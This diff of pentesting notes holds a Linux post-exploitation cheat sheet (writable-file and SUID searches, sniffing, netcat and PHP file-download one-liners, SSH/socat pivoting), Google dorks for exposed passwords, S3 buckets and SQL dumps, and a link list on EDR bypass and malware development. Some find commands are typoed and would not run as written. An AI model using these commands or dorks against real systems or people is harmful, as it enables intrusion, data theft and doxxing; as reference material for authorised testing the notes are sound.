203	+	Find Writable Files for Users or Groups
204	+
205	+	```
206	+	find / perm /u=w -user `whoami` 2>/dev/null
207	+	find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
208	+	find / -perm /u+w -user `whoami` 2>/dev/nul
209	+	```
210	+
211	+	Find Writable Directories for Users or Groups
212	+
213	+	```
214	+	find / perm /u=w -type -d -user `whoami` 2>/dev/null
215	+	find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null
216	+	```
217	+
218	+	Find World Writable Directories
219	+
220	+	```
221	+	find / $ -wholename '/home/homedir*' -prune $ -o $ -type d -perm -0002 $ -exec ls -ld '{}' ';'
222	+	2>/dev/null \| grep -v root
223	+
224	+	find / -writable -type d 2>/dev/null
225	+	```
226	+
227	+	Find World Writable Directories for Root
228	+
229	+	```
230	+	find / $ -wholename ‘/home/homedir*’ -prune $ -o $ -type d -perm -0002 $ -exec ls -ld ‘{}’ ‘;’
231	+	2>/dev/null \| grep root
232	+	```
233	+
234	+	Find World Writable Files
235	+
236	+	```
237	+	find / $ -wholename ‘/home/homedir/’ -prune -o -wholename ‘/proc/’ -prune $ -o \( -type f -perm
238	+	-0002 \) -exec ls -l ‘{}’ ‘;’ 2>/dev/null
239	+	```
240	+
241	+	Find World Writable files in /etc
242	+
243	+	```
244	+	find /etc -perm -2 -type f 2>/dev/null
245	+	```
246	+
247	+	Sniff Traffic
248	+
249	+	```
250	+	tcpdump -i eth0 <protocol>
251	+	tcpdump -i any -s0 -w capture.pcap
252	+	tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X
253	+	tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X
254	+	```
255	+
256	+	User Installed Software (Sometimes Misconfigured)
257	+
258	+	```
259	+	/usr/local/
260	+	/usr/local/src
261	+	/usr/local/bin
262	+	/opt/
263	+	/home
264	+	/var/
265	+	/usr/src/
266	+	```
267	+
268	+	### Post Exploitation
269	+
270	+	Get Capabilities
271	+
272	+	```
273	+	/sbin/getcap -r / 2>/dev/null
274	+	```
275	+
276	+	Get SUID Binaries
277	+
278	+	```
279	+	find / -perm -u=s -type f 2>/dev/null
280	+	```
281	+
282	+	Check Sudo Config
283	+
284	+	### File Transfers
285	+
286	+	Base64
287	+
288	+	```
289	+	cat file.transfer \| base64 -w 0
290	+	echo base64blob \| base64 -d > file.transfer
291	+	```
292	+
293	+	Curl
294	+
295	+	```
296	+	curl http://webserver/file.txt > output.txt
297	+	```
298	+
299	+	wget
300	+
301	+	```
302	+	wget http://webserver/file.txt > output.txt
303	+	```
304	+
305	+	FTP
306	+
307	+	```
308	+	pip install pyftpdlib
309	+	python -m pyftpdlib -p 21 -w
310	+	```
311	+
312	+	TFTP
313	+
314	+	```
315	+	service atftpd start
316	+	atftpd --daemon --port 69 /tftp
317	+	/etc/init.d/atftpd restart
318	+	auxiliary/server/tftp
319	+	```
320	+
321	+	NC Listeners
322	+
323	+	```
324	+	nc -lvnp 443 < filetotransfer.txt
325	+	nc <ip> 443 > filetransfer.txt
326	+	```
327	+
328	+	PHP File Transfers
329	+
330	+	```
331	+	echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
332	+	```
333	+
334	+	SCP
335	+
336	+	```
337	+	# Copy a file:
338	+	scp /path/to/source/file.ext [email protected]:/path/to/destination/file.ext
339	+
340	+	# Copy a directory:
341	+	scp -r /path/to/source/dir [email protected]:/path/to/destination
342	+	```
343	+
344	+	### Lateral Movement / Pivoting
345	+
346	+	SSH Local Port Forward
347	+
348	+	```
349	+	ssh <user>@<target> -L 127.0.0.1:8888:<targetip>:<targetport>
350	+	```
351	+
352	+	SSH Dynamic Port Forward
353	+
354	+	```
355	+	ssh -D <localport> user@host
356	+	nano /etc/proxychains.conf
357	+	127.0.0.1 <localport>
358	+	```
359	+
360	+	Socat Port Forward
361	+
362	+	```
363	+	./socat tcp-listen:5000,reuseaddr,fork tcp:<target ip>:5001
364	+	```
365	+

cheat-sheets/windows-cheatsheet.md

Diff is too large to be displayed.

■ ■ ■ ■ ■ ■

overview/google-dorks.md

1	+	# Google Dorks
2	+
3	+	Title: Google Dorks for Targeted Information Search
4	+
5	+	People and Accounts:
6	+
7	+	1. Search for emails based on a username:
8	+
9	+	```
10	+	"username*com"
11	+	```
12	+	2. Search for online resumes of a person:
13	+
14	+	```
15	+	inurl:resume "john smith"
16	+	intext:resume "john smith"
17	+	```
18	+	3. Search for people with a specific job title and location on LinkedIn:
19	+
20	+	```
21	+	site:http://linkedin.com/in "<job title>" ( OR ☏ OR ✆ OR
22	+	```
23	+	4. Find people within GitHub code:
24	+
25	+	```
26	+	site:http://github.com/orgs/*/people
27	+	```
28	+	5. Search for lists of attendees or finalists:
29	+
30	+	```
31	+	intitle:final.attendee.list OR inurl:final.attendee.list
32	+	```
33	+	6. Search for login information on exposed Trello boards:
34	+
35	+	```
36	+	site:http://trello.com password + admin OR username
37	+	```
38	+
39	+	Documents:
40	+
41	+	1. Search for specific documents within a domain in PDF format:
42	+
43	+	```
44	+	site:<domain> filetype:PDF
45	+	```
46	+	2. Search for PDF documents containing possible email information within a specific domain:
47	+
48	+	```
49	+	filetype:pdf <domain> "email"
50	+	```
51	+	3. Search for XLS files within government websites:
52	+
53	+	```
54	+	filetype:xls site:.gov
55	+	```
56	+
57	+	Cloud, Buckets, and Databases:
58	+
59	+	1. Search for confidential or top-secret documents within open Amazon S3 buckets:
60	+
61	+	```
62	+	site:http://s3.amazonaws.com confidential OR "top secret"
63	+	```
64	+	2. Search for confidential login information within XLS files on Amazon buckets:
65	+
66	+	```
67	+	s3 site:http://amazonaws.com filetype:xls password
68	+	```
69	+	3. Search for copies of databases:
70	+
71	+	```
72	+	ext:sql intext:"-- phpMyAdmin SQL Dump"
73	+	```
74	+
75	+	Social Media:
76	+
77	+	1. Search for a specific tweet shared on other media, excluding Twitter:
78	+
79	+	```
80	+	"text of a tweet" -site:https://twitter.com
81	+	```
82	+	2. Search for links or information related to a specific username not coming directly from their Twitter timeline:
83	+
84	+	```
85	+	@dutch_osintguy -site:twitter.com/dutch_osintguy
86	+	```
87	+
88	+	Please note that these Google Dorks are intended for authorized purposes and should be used responsibly.
89	+

■ ■ ■ ■ ■ ■

overview/resourses/hacking-resources.md

1	+	# Hacking Resources
2	+
3	+	* [Hacking Resources](broken-reference)
4	+	* [Usefull Web Browser plugins](broken-reference)
5	+	* [Cool Tools/Labs](broken-reference)
6	+	* [Linux Privilege Escalation](broken-reference)
7	+	* [Windows Privilege Escalation](broken-reference)
8	+	* [Windows stuff](broken-reference)
9	+	* [Powershell](broken-reference)
10	+	* [Linux stuff](broken-reference)
11	+	* [Pivoting](broken-reference)
12	+	* [Brute force/Cracking](broken-reference)
13	+	* [Red Team](broken-reference)
14	+	* [Exploit Development/Reversing/AV\|EDR Bypass/Malware Analysis](broken-reference)
15	+	* [Compiling exploits](broken-reference)
16	+	* [Obfuscators](broken-reference)
17	+	* [Deobfuscators](broken-reference)
18	+	* [Buffer Overflows](broken-reference)
19	+	* [General Hacking Cheatsheets/Cool Articles/Podcasts](broken-reference)
20	+	* [Cobalt Strike](broken-reference)
21	+	* [Bug Bounty/Web Security](broken-reference)
22	+	* [Subdomain finders](broken-reference)
23	+	* [Subdomain takeover](broken-reference)
24	+	* [Discovering of Target by using ASN (IP Blocks) and reverse whois](broken-reference)
25	+	* [Screenshotting](broken-reference)
26	+	* [Cool presentations/videos](broken-reference)
27	+	* [Cool Books](broken-reference)
28	+	* [Infosec twitter accounts to follow (it’s a really awesome way to learn as well!. Will keep adding them)](broken-reference)
29	+
30	+	### Hacking Resources <a href="#hacking-resources" id="hacking-resources"></a>
31	+
32	+	This isn’t more than another hacking resources list. I basically throw here every resource I get interested on taking a look/playing with it, or stuff that I use as a reference while trying to break something.
33	+
34	+	Usefull Web Browser plugins
35	+
36	+	* [https://www.wappalyzer.com/download/](https://www.wappalyzer.com/download/)
37	+	* [https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/](https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/) <—— For Firefox
38	+	* [https://chrome.google.com/webstore/detail/foxyproxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp](https://chrome.google.com/webstore/detail/foxyproxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfnp) <—— For Chrome
39	+	* [https://cookie-editor.cgagnier.ca/#download](https://cookie-editor.cgagnier.ca/#download)
40	+	* [https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/](https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/)
41	+
42	+	Cool Tools/Labs
43	+
44	+	* [https://hackthebox.eu/](https://hackthebox.eu/)
45	+	* [https://www.vulnhub.com/](https://www.vulnhub.com/)
46	+	* [https://www.blacklanternsecurity.com/2020-12-02-WriteHat/](https://www.blacklanternsecurity.com/2020-12-02-WriteHat/)
47	+	* [https://github.com/madhuakula/kubernetes-goat](https://github.com/madhuakula/kubernetes-goat)
48	+	* [https://github.com/m8r0wn/ActiveReign](https://github.com/m8r0wn/ActiveReign)
49	+	* [https://github.com/sundowndev/PhoneInfoga](https://github.com/sundowndev/PhoneInfoga)
50	+	* [https://github.com/GoSecure/dtd-finder](https://github.com/GoSecure/dtd-finder)
51	+	* [https://www.shodan.io/](https://www.shodan.io/)
52	+	* [https://crt.sh/](https://crt.sh/)
53	+	* [https://censys.io/](https://censys.io/)
54	+	* [https://dnsdumpster.com/](https://dnsdumpster.com/)
55	+	* [https://mxtoolbox.com/](https://mxtoolbox.com/)
56	+	* [https://github.com/OWASP/owasp-mstg/tree/master/Crackmes](https://github.com/OWASP/owasp-mstg/tree/master/Crackmes)
57	+	* [https://github.com/oversecured/ovaa](https://github.com/oversecured/ovaa)
58	+	* [https://github.com/OWASP/NodeGoat](https://github.com/OWASP/NodeGoat)
59	+	* [https://owasp.org/www-project-juice-shop/](https://owasp.org/www-project-juice-shop/)
60	+	* [https://portswigger.net/web-security](https://portswigger.net/web-security)
61	+	* [https://github.com/bee-san/pyWhat](https://github.com/bee-san/pyWhat)
62	+
63	+	Linux Privilege Escalation
64	+
65	+	* [https://gtfobins.github.io/](https://gtfobins.github.io/)
66	+	* [https://book.hacktricks.xyz/linux-unix/privilege-escalation](https://book.hacktricks.xyz/linux-unix/privilege-escalation)
67	+	* [https://guif.re/linuxeop](https://guif.re/linuxeop)
68	+	* [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
69	+	* [https://www.win.tue.nl/\~aeb/linux/hh/hh-8.html](https://www.win.tue.nl/\~aeb/linux/hh/hh-8.html)
70	+	* [http://www.dankalia.com/tutor/01005/0100501004.htm](http://www.dankalia.com/tutor/01005/0100501004.htm)
71	+	* [https://blog.ikuamike.io/posts/2021/package\_managers\_privesc/](https://blog.ikuamike.io/posts/2021/package\_managers\_privesc/)
72	+
73	+	Windows Privilege Escalation
74	+
75	+	* [https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
76	+	* [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)
77	+	* [https://github.com/J3rryBl4nks/LPEWalkthrough/blob/master/Walkthrough.md](https://github.com/J3rryBl4nks/LPEWalkthrough/blob/master/Walkthrough.md)
78	+	* [https://github.com/worawit/MS17-010](https://github.com/worawit/MS17-010) <—— Eternal blue without MSF
79	+	* [https://github.com/ankh2054/windows-pentest](https://github.com/ankh2054/windows-pentest)
80	+	* [https://sushant747.gitbooks.io/total-oscp-guide/privilege\_escalation\_windows.html](https://sushant747.gitbooks.io/total-oscp-guide/privilege\_escalation\_windows.html)
81	+	* [https://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html](https://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html)
82	+	* [https://github.com/frizb/Windows-Privilege-Escalation](https://github.com/frizb/Windows-Privilege-Escalation)
83	+
84	+	Windows stuff
85	+
86	+	* [http://www.cheat-sheets.org/saved-copy/Windows\_folders\_quickref.pdf](http://www.cheat-sheets.org/saved-copy/Windows\_folders\_quickref.pdf)
87	+	* [https://www.lemoda.net/windows/windows2unix/windows2unix.html](https://www.lemoda.net/windows/windows2unix/windows2unix.html)
88	+	* [https://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html](https://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html)
89	+	* [https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
90	+	* [https://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html](https://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html)
91	+	* [https://malicious.link/post/2016/kerberoast-pt1/](https://malicious.link/post/2016/kerberoast-pt1/)
92	+	* [https://gist.github.com/pwntester/72f76441901c91b25ee7922df5a8a9e4](https://gist.github.com/pwntester/72f76441901c91b25ee7922df5a8a9e4) <— DotNetNuke (CVE-2017-9822) Payloads
93	+
94	+	Powershell
95	+
96	+	* [https://vipulvyas0813.medium.com/introduction-to-powershell-for-penetration-testing-733236bc9547](https://vipulvyas0813.medium.com/introduction-to-powershell-for-penetration-testing-733236bc9547) <—— Serie about Poershell for Penetration Testing (5 posts)
97	+
98	+	Linux stuff
99	+
100	+	* [http://www.pathname.com/fhs/pub/fhs-2.3.html](http://www.pathname.com/fhs/pub/fhs-2.3.html)
101	+	* [http://www.linusakesson.net/programming/tty/](http://www.linusakesson.net/programming/tty/)
102	+	* [http://pentestmonkey.net/blog/post-exploitation-without-a-tty](http://pentestmonkey.net/blog/post-exploitation-without-a-tty)
103	+
104	+	Pivoting
105	+
106	+	* [https://artkond.com/2017/03/23/pivoting-guide/](https://artkond.com/2017/03/23/pivoting-guide/)
107	+	* [https://nullsweep.com/pivot-cheatsheet-for-pentesters/](https://nullsweep.com/pivot-cheatsheet-for-pentesters/)
108	+	* [https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html](https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html)
109	+
110	+	Brute force/Cracking
111	+
112	+	* [https://github.com/Coalfire-Research/npk](https://github.com/Coalfire-Research/npk) <—— Distributed hash-cracking platform on serverless AWS componentes
113	+	* [https://hashcat.net/wiki/doku.php?id=example\_hashes](https://hashcat.net/wiki/doku.php?id=example\_hashes)
114	+	* [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists)
115	+	* [https://github.com/rapid7/ssh-badkeys](https://github.com/rapid7/ssh-badkeys)
116	+	* [https://crackstation.net/](https://crackstation.net/)
117	+
118	+	Red Team
119	+
120	+	* [https://3xpl01tc0d3r.blogspot.com/2021/07/resource-based-constrained-delegation.html?m=1](https://3xpl01tc0d3r.blogspot.com/2021/07/resource-based-constrained-delegation.html?m=1) <– Resource Based Constrained Delegation IN LINUX
121	+	* [https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/)
122	+	* [https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
123	+	* [https://pentestbook.six2dez.com/post-exploitation/windows/ad/kerberos-attacks](https://pentestbook.six2dez.com/post-exploitation/windows/ad/kerberos-attacks)
124	+	* [https://www.ired.team/](https://www.ired.team/)
125	+	* [https://www.harmj0y.net/blog/](https://www.harmj0y.net/blog/) \\<—— Awesome Active Directory Posts \\
126	+	* [https://malicious.link/post/2016/kerberoast-pt1/](https://malicious.link/post/2016/kerberoast-pt1/) <—— Serie about Kerberoasting (5 posts)
127	+	* [https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)
128	+	* [https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/](https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/) <– Abuse Constrained Delegation
129	+	* [https://twitter.com/cube0x0/status/1468860246307258370?s=21](https://twitter.com/cube0x0/status/1468860246307258370?s=21)
130	+
131	+	Exploit Development/Reversing/AV\|EDR Bypass/Malware Analysis
132	+
133	+	* [https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
134	+	* [https://amsi.fail/](https://amsi.fail/) <—- Automatic generation of some AMSI Bypass
135	+	* [https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf](https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf)
136	+	* [https://ppn.snovvcrash.rocks/red-team/malware-development/code-injection/shellcode-runners](https://ppn.snovvcrash.rocks/red-team/malware-development/code-injection/shellcode-runners)
137	+	* [https://samsclass.info/126/126\_F21.shtml](https://samsclass.info/126/126\_F21.shtml) <— Practical Malware Analysis Course!
138	+	* [https://www.ringzerolabs.com/2019/08/fast-and-free-malware-analysis-lab-setup.html](https://www.ringzerolabs.com/2019/08/fast-and-free-malware-analysis-lab-setup.html)
139	+	* [https://epi052.gitlab.io/notes-to-self/blog/2021-06-16-windows-usermode-exploit-development-review/](https://epi052.gitlab.io/notes-to-self/blog/2021-06-16-windows-usermode-exploit-development-review/)
140	+	* [https://github.com/m0n0ph1/Process-Hollowing](https://github.com/m0n0ph1/Process-Hollowing)
141	+	* [https://www.virusbulletin.com/virusbulletin/2011/10/okay-so-you-are-win32-emulator](https://www.virusbulletin.com/virusbulletin/2011/10/okay-so-you-are-win32-emulator)
142	+	* [https://www.usenix.org/system/files/conference/woot16/woot16-paper-blackthorne\_update.pdf](https://www.usenix.org/system/files/conference/woot16/woot16-paper-blackthorne\_update.pdf)
143	+	* [https://blog.sannemaasakkers.com/2021/08/07/adversary-phishing-characteristics/](https://blog.sannemaasakkers.com/2021/08/07/adversary-phishing-characteristics/)
144	+	* [https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/](https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/)
145	+	* [https://roberreigada.github.io/posts/playing\_with\_an\_edr/](https://roberreigada.github.io/posts/playing\_with\_an\_edr/)
146	+	* [https://github.com/jthuraisamy/SysWhispers](https://github.com/jthuraisamy/SysWhispers)
147	+	* [https://raw.githubusercontent.com/Mr-Un1k0d3r/EDRs/main/cortex.txt](https://raw.githubusercontent.com/Mr-Un1k0d3r/EDRs/main/cortex.txt) <—– NON documented API’s, possible AV/EDR Bypass?
148	+	* [https://0xpat.github.io/Malware\_development\_part\_1/](https://0xpat.github.io/Malware\_development\_part\_1/) <—- Malware Devlopment series
149	+	* [https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation](https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation)
150	+	* [https://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html](https://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html)
151	+	* [https://n4r1b.netlify.app/posts/2020/01/dissecting-the-windows-defender-driver-wdfilter-part-1/](https://n4r1b.netlify.app/posts/2020/01/dissecting-the-windows-defender-driver-wdfilter-part-1/)
152	+	* [https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing](https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing)
153	+	* [https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection](https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection) <— APC Bypass
154	+	* [https://pinvoke.net/](https://pinvoke.net/) <—— Documented APIs for Bypass
155	+	* [https://antiscan.me/](https://antiscan.me/)
156	+	* [https://github.com/stephenfewer/ReflectiveDLLInjection](https://github.com/stephenfewer/ReflectiveDLLInjection) –> ReflectiveDLLInjection en Powershell!!!!
157	+	* [https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) –> Invoke-ReflectivePEInjection Powershell
158	+	* [https://blogs.msdn.microsoft.com/joelpob/2004/02/15/creating-delegate-types-via-reflection-emit/](https://blogs.msdn.microsoft.com/joelpob/2004/02/15/creating-delegate-types-via-reflection-emit/)
159	+	* [https://web.archive.org/web/20120520182849/http://www.exploit-monday.com/2012\_05\_13\_archive.html](https://web.archive.org/web/20120520182849/http://www.exploit-monday.com/2012\_05\_13\_archive.html)
160	+
161	+	Compiling exploits
162	+
163	+	* [https://stackoverflow.com/questions/4032373/linking-against-an-old-version-of-libc-to-provide-greater-application-coverage](https://stackoverflow.com/questions/4032373/linking-against-an-old-version-of-libc-to-provide-greater-application-coverage)
164	+	* [https://www.lordaro.co.uk/posts/2018-08-26-compiling-glibc.html](https://www.lordaro.co.uk/posts/2018-08-26-compiling-glibc.html)
165	+	* [https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/](https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/)
166	+
167	+	Obfuscators
168	+
169	+	* [https://github.com/danielbohannon/Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)
170	+	* [https://github.com/Bashfuscator/Bashfuscator](https://github.com/Bashfuscator/Bashfuscator)
171	+
172	+	Deobfuscators
173	+
174	+	* [https://www.unphp.net/](https://www.unphp.net/)
175	+	* [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/)
176	+	* [http://jsnice.org/](http://jsnice.org/)
177	+	* [https://github.com/java-deobfuscator/deobfuscator](https://github.com/java-deobfuscator/deobfuscator)
178	+
179	+	Buffer Overflows
180	+
181	+	* [https://github.com/justinsteven/dostackbufferoverflowgood](https://github.com/justinsteven/dostackbufferoverflowgood)
182	+	* [https://github.com/stephenbradshaw/vulnserver](https://github.com/stephenbradshaw/vulnserver)
183	+	* [https://www.vulnhub.com/entry/brainpan-1,51/](https://www.vulnhub.com/entry/brainpan-1,51/)
184	+	* [https://exploit.education/phoenix/](https://exploit.education/phoenix/)
185	+	* [https://www.youtube.com/watch?v=1S0aBV-Waeo](https://www.youtube.com/watch?v=1S0aBV-Waeo)
186	+
187	+	General Hacking Cheatsheets/Cool Articles/Podcasts
188	+
189	+	* [https://github.com/chvancooten/OSEP-Code-Snippets](https://github.com/chvancooten/OSEP-Code-Snippets) <—- OSEP Code Snippets!
190	+	* [https://github.com/tagnullde/OSCP/blob/master/oscp-cheatsheet.md](https://github.com/tagnullde/OSCP/blob/master/oscp-cheatsheet.md)
191	+	* [https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads](https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads)
192	+	* [https://redtm.com/docs/web-pentest/2021-01-12-web-penetration-testing-task-check-list/](https://redtm.com/docs/web-pentest/2021-01-12-web-penetration-testing-task-check-list/)
193	+	* [https://github.com/Optixal/OSCP-PWK-Notes-Public/](https://github.com/Optixal/OSCP-PWK-Notes-Public/)
194	+	* [https://epi052.gitlab.io/notes-to-self/blog/2021-06-16-windows-usermode-exploit-development-review/](https://epi052.gitlab.io/notes-to-self/blog/2021-06-16-windows-usermode-exploit-development-review/)
195	+	* [https://github.com/OlivierLaflamme/Cheatsheet-God/](https://github.com/OlivierLaflamme/Cheatsheet-God/)
196	+	* [https://github.com/sinfulz/JustTryHarder/](https://github.com/sinfulz/JustTryHarder/)
197	+	* [https://github.com/0x4D31/awesome-oscp](https://github.com/0x4D31/awesome-oscp)
198	+	* [https://github.com/xapax/security](https://github.com/xapax/security)
199	+	* [https://book.hacktricks.xyz/](https://book.hacktricks.xyz/)
200	+	* [https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html](https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html)
201	+	* [https://www.netsecfocus.com/oscp/2019/03/29/The\_Journey\_to\_Try\_Harder-\_TJNulls\_Preparation\_Guide\_for\_PWK\_OSCP.html](https://www.netsecfocus.com/oscp/2019/03/29/The\_Journey\_to\_Try\_Harder-\_TJNulls\_Preparation\_Guide\_for\_PWK\_OSCP.html)
202	+	* [https://github.com/Hack-with-Github/Awesome-Hacking](https://github.com/Hack-with-Github/Awesome-Hacking)
203	+	* [https://jhalon.github.io/becoming-a-pentester/](https://jhalon.github.io/becoming-a-pentester/)
204	+	* [https://www.inteltechniques.com/podcast.html](https://www.inteltechniques.com/podcast.html)
205	+	* [https://darknetdiaries.com/](https://darknetdiaries.com/)
206	+	* [https://lobuhisec.medium.com/kubernetes-pentest-recon-checklist-tools-and-resources-30d8e4b69463](https://lobuhisec.medium.com/kubernetes-pentest-recon-checklist-tools-and-resources-30d8e4b69463)
207	+
208	+	Cobalt Strike
209	+
210	+	* [https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet](https://github.com/S1ckB0y1337/Cobalt-Strike-CheatSheet)
211	+
212	+	Bug Bounty/Web Security
213	+
214	+	* [https://owasp.org/www-project-top-ten/](https://owasp.org/www-project-top-ten/)
215	+	* [https://www.hackerone.com/blog/Guide-Subdomain-Takeovers](https://www.hackerone.com/blog/Guide-Subdomain-Takeovers)
216	+	* [https://0xpatrik.com/subdomain-takeover-ns/](https://0xpatrik.com/subdomain-takeover-ns/)
217	+	* [https://github.com/OWASP/wstg](https://github.com/OWASP/wstg)
218	+	* [https://github.com/swisskyrepo/PayloadsAllTheThings/](https://github.com/swisskyrepo/PayloadsAllTheThings/)
219	+	* [https://tomnomnom.com/talks/bug-bounties-with-bash-virsec.pdf](https://tomnomnom.com/talks/bug-bounties-with-bash-virsec.pdf)
220	+	* [https://docs.google.com/presentation/d/1DAQ47VjIaQZ88Ly00eGPQupq79hAF9AAZstV7OVCY\_8](https://docs.google.com/presentation/d/1DAQ47VjIaQZ88Ly00eGPQupq79hAF9AAZstV7OVCY\_8)
221	+	* [https://github.com/ngalongc/bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference)
222	+	* [https://gowsundar.gitbook.io/book-of-bugbounty-tips](https://gowsundar.gitbook.io/book-of-bugbounty-tips)
223	+	* [https://github.com/jdonsec/AllThingsSSRF](https://github.com/jdonsec/AllThingsSSRF)
224	+	* [https://github.com/jdonsec/AllThingsXXE](https://github.com/jdonsec/AllThingsXXE)
225	+	* [https://xsleaks.com/](https://xsleaks.com/)
226	+	* [https://www.reddit.com/r/bugbounty/comments/983odf/how\_to\_become\_a\_bug\_bounty\_hunter/](https://www.reddit.com/r/bugbounty/comments/983odf/how\_to\_become\_a\_bug\_bounty\_hunter/)
227	+	* [https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/)
228	+	* [https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066](https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066) \\<—— Serie of 3 post about Bug Hunting Methodology \\
229	+	* [https://github.com/ngalongc/bug-bounty-reference](https://github.com/ngalongc/bug-bounty-reference)
230	+	* [https://pentester.land/list-of-bug-bounty-writeups.html](https://pentester.land/list-of-bug-bounty-writeups.html)
231	+	* [https://twitter.com/FaniMalikHack/status/1355145481479999488](https://twitter.com/FaniMalikHack/status/1355145481479999488) \\<—— Tweet by @FaniMalikHack with an infographic about JWT \\
232	+
233	+	Subdomain finders
234	+
235	+	* [https://github.com/projectdiscovery/subfinder](https://github.com/projectdiscovery/subfinder)
236	+	* [https://github.com/guelfoweb/knock](https://github.com/guelfoweb/knock)
237	+	* [https://crt.sh/](https://crt.sh/)
238	+	* [https://shodan.io/](https://shodan.io/)
239	+	* [https://censys.io/ipv4/](https://censys.io/ipv4/)
240	+	* [https://securitytrails.com/](https://securitytrails.com/)
241	+	* [https://github.com/OWASP/Amass](https://github.com/OWASP/Amass)
242	+	* [https://www.crunchbase.com/search/acquisitions](https://www.crunchbase.com/search/acquisitions) \\<—— Discovering searching by acquisitions \\
243	+
244	+	Subdomain takeover
245	+
246	+	* [https://github.com/EdOverflow/can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz)
247	+	* [https://github.com/projectdiscovery/nuclei](https://github.com/projectdiscovery/nuclei)
248	+
249	+	Discovering of Target by using ASN (IP Blocks) and reverse whois
250	+
251	+	* [https://bgp.he.net/](https://bgp.he.net/)
252	+	* [https://apps.db.ripe.net/db-web-ui/#/fulltextsearch](https://apps.db.ripe.net/db-web-ui/#/fulltextsearch)
253	+	* [https://whois.arin.net/ui/query.do](https://whois.arin.net/ui/query.do)
254	+	* [https://whoxy.com/](https://whoxy.com/)
255	+	* [https://github.com/vysecurity/DomLink](https://github.com/vysecurity/DomLink)
256	+
257	+	Screenshotting
258	+
259	+	* [https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)
260	+	* [https://github.com/FortyNorthSecurity/EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness)
261	+	* [https://github.com/breenmachine/httpscreenshot](https://github.com/breenmachine/httpscreenshot)
262	+	* [https://github.com/maaaaz/webscreenshot](https://github.com/maaaaz/webscreenshot)
263	+
264	+	Cool presentations/videos
265	+
266	+	* Defeating EDRs using Dynamic Invocation - Jean Francois Maes [https://youtu.be/LXfhyTpQ7TM](https://youtu.be/LXfhyTpQ7TM)
